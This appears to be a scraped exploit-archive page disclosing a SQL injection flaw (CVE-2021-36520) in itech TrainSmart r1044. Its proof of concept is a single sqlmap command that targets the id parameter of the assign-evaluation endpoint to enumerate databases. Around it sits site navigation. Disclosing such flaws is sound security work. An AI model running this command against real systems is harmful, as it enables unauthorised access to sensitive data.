itech TrainSmart r1044 SQL Injection

itech TrainSmart r1044 SQL Injection: Posted Apr 6, 2023; Authored by Adrian Bondocea; itech TrainSmart version r1044 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; advisories | CVE-2021-36520; SHA-256 | 4a9685c1efb2546a1cb07cb34c4753fd59b701ba0dc27c00742a231552f92b23; Download | Favorite | View

itech TrainSmart r1044 SQL Injection

# Exploit Title: itech TrainSmart r1044 - SQL injection
# Date: 03.02.2023
# Exploit Author: Adrian Bondocea
# Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/
# Version: TrainSmart r1044
# Tested on: Linux
# CVE : CVE-2021-36520

SQL injection vulnerability in itech TrainSmart r1044 allows remote
attackers to view sensitive information via crafted command using sqlmap.

PoC:
sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs

Top Authors In Last 30 Days

Red Hat 213 files
Ubuntu 90 files
Gentoo 31 files
Debian 22 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Amit Roy 4 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

itech TrainSmart r1044 SQL Injection

itech TrainSmart r1044 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

itech TrainSmart r1044 SQL Injection

Share This

itech TrainSmart r1044 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems